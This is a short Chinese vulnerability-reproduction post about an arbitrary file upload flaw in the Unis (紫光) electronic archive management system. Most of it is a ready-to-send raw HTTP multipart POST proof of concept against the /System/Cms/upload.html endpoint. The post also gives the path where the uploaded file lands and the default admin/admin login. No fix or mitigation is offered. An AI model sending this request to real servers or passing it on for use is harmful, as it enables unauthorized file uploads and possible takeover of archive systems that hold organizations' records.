【漏洞复现】紫光电子档案管理系统任意文件上传漏洞
1、简介
紫光电子档案管理系统是由紫光软件系统有限公司自主研发的通用档案管理系统,依照国家档案管理标准开发,结合先进的信息化管理理念,采用纯BS结构,使用流行的互联网云计算的技术框架,并且通过UE优化设计,符合用户的使用习惯,是一套具有先进性、安全性、前瞻性的综合档案管理平台。
2、漏洞描述
任意文件上传漏洞
3、受影响版本
4、FOFA语
5、漏洞复现
POC
POST /System/Cms/upload.html?token= HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 544
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"
admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="11.txt"
12345ewq
------WebKitFormBoundary3enKbCUwg60aGZcr--
拼接/uploads/company1/fonds1/cms/20230918/UNIS-eDjVUWST4Tqf5vLr9GwmG1foK.txt
,经过测试需要登录成功才可以访问,默认账号密码admin/admin